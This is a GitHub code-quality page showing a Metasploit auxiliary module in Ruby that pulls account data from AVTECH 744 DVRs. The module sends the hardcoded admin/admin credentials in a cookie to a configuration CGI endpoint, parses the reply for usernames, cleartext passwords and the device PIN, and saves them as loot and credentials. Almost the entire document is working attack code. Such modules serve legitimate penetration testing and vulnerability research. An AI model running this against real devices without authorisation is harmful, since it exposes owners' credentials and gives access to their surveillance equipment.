rapid7/metasploit-framework

View on GitHub
modules/auxiliary/gather/avtech744_dvr_accounts.rb

Summary

Maintainability
A
2 hrs
Test Coverage
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'AVTECH 744 DVR Account Information Retrieval',
      'Description'    => %q{
        This module will extract the account information from the AVTECH 744 DVR devices,
        including usernames, cleartext passwords, and the device PIN, along with
        a few other miscellaneous details. In order to extract the information, hardcoded
        credentials admin/admin are used. These credentials can't be changed from the device
        console UI nor from the web UI.
      },
      'Author'         => [ 'nstarke' ],
      'License'        => MSF_LICENSE
    ))
  end


  def run
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => '/cgi-bin/user/Config.cgi',
      'cookie' => "SSID=#{Rex::Text.encode_base64('admin:admin')};",
      'vars_post' => {
        'action' => 'get',
        'category' => 'Account.*'
      }
    })

    unless res
      fail_with(Failure::Unreachable, 'No response received from the target')
    end

    unless res.code == 200
      fail_with(Failure::Unknown, 'An unknown error occurred')
    end

    raw_collection = extract_data(res.body)
    extract_creds(raw_collection)

    p = store_loot('avtech744.dvr.accounts', 'text/plain', rhost, res.body)
    print_good("avtech744.dvr.accounts stored in #{p}")
  end

  def extract_data(body)
    raw_collection = []
    body.each_line do |line|
      key, value = line.split('=')
      if key && value
        _, second, third = key.split('.')
        if third
          index = second.slice(second.length - 1).to_i
          raw_collection[index] = raw_collection[index] ||= {}
          case third
          when 'Username'
            raw_collection[index][:username] = value.strip!
          when 'Password'
            raw_collection[index][:password] = value.strip!
          end
        elsif second.include?('Password')
          print_good("PIN Retrieved: #{key} - #{value.strip!}")
        end
      end
    end

    raw_collection
  end

  def extract_creds(raw_collection)
    raw_collection.each do |raw|
      unless raw
        next
      end

      service_data = {
        address: rhost,
        port: rport,
        service_name: 'http',
        protocol: 'tcp',
        workspace_id: myworkspace_id
      }

      credential_data = {
        module_fullname: self.fullname,
        origin_type: :service,
        private_data: raw[:password],
        private_type: :password,
        username: raw[:username]
      }

      credential_data.merge!(service_data)

      credential_core = create_credential(credential_data)

      login_data = {
        core: credential_core,
        status: Metasploit::Model::Login::Status::UNTRIED
      }

      login_data.merge!(service_data)

      create_credential_login(login_data)
    end
  end
end